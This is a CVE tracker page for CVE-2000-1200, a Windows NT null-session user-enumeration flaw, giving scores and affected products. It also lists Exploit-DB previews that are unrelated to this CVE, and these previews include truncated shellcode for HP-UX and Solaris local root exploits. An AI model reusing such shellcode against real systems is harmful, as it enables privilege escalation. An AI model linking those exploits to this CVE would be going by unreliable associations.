CVE-2000-1200
published 2001-08-31CVE-2000-1200: Windows NT allows remote attackers to list all users in a domain by obtaining the domain SID with the LsaQueryInformationPolicy policy function via a null…
PriorityP425medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
48.10%
98.7th percentile
Windows NT allows remote attackers to list all users in a domain by obtaining the domain SID with the LsaQueryInformationPolicy policy function via a null session and using the SID to list the users.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_nt | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
exploitdb·2017-03-22
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
---
SEC Consult Vulnerability Lab Security Advisory
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://www.solar-log.com/de/home.html
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
Vendor description:
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in
Exploit-DB
HP-UX 11.0 - '/bin/cu' Local Privilege Escalation
exploitdb·2001-01-13
CVE-2000-1028 HP-UX 11.0 - '/bin/cu' Local Privilege Escalation
HP-UX 11.0 - '/bin/cu' Local Privilege Escalation
---
/*
* Copyright (c) 2001 Zorgon
* All Rights Reserved
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* HP-UX /bin/cu exploit.
* Tested on HP-UX 11.00
* [email protected] (http://www.nightbird.free.fr)
*
*/
#include
#include
#include
#include
#define LEN 9778
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200 /* it works for me */
u_char hppa_shellcode[] = /* K2 shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
int
main(int argc , char **argv){
char buffer[LEN+8
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
exploitdb·2000-04-24
CVE-2000-0317 Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
#include
#include
#define BSIZE 18001
#define OFFSET 20112
#define START 700
#define END 1200
#define NOP 0xac15a16e
#define EXSTART 116
char sparc_shellcode[] =
/* setreuid(0,0) */
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"
/* other stuff */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80
Exploit-DB
Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (1)
exploitdb·1999-05-23
CVE-2000-0407 Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (1)
Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/1200/info
A buffer overrun exists in the 'netpr' program, part of the SUNWpcu (LP) package included with Solaris, from Sun Microsystems. Versions of netpr on Solaris 2.6 and 7, on both Sparc and x86 have been confirmed as being vulnerable. The overflow is present in the -p option, normally used to specify a printer. By specifying a long buffer containing machine executable code, it is possible to execute arbitrary commands as root. On Sparc, the exploits provided will spawn a root shell, whereas on x86 it will create a setuid root shell in /tmp.
/**
*** netprex - SPARC Solaris root exploit for /usr/lib/lp/bin/netpr
***
*** Tested and confirmed under Solaris 2.6 and 7 (SPARC)
***
*** U
Exploit-DB
Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (2)
exploitdb·1999-03-04
CVE-2000-0407 Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (2)
Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/1200/info
A buffer overrun exists in the 'netpr' program, part of the SUNWpcu (LP) package included with Solaris, from Sun Microsystems. Versions of netpr on Solaris 2.6 and 7, on both Sparc and x86 have been confirmed as being vulnerable. The overflow is present in the -p option, normally used to specify a printer. By specifying a long buffer containing machine executable code, it is possible to execute arbitrary commands as root. On Sparc, the exploits provided will spawn a root shell, whereas on x86 it will create a setuid root shell in /tmp.
/**
*** netprex - i386 Solaris root exploit for /usr/lib/lp/bin/netpr
***
*** Tested and confirmed under Solaris 2.6 and 7 (i386)
***
*** Usa
No writeups or analysis indexed.
2001-08-31
Published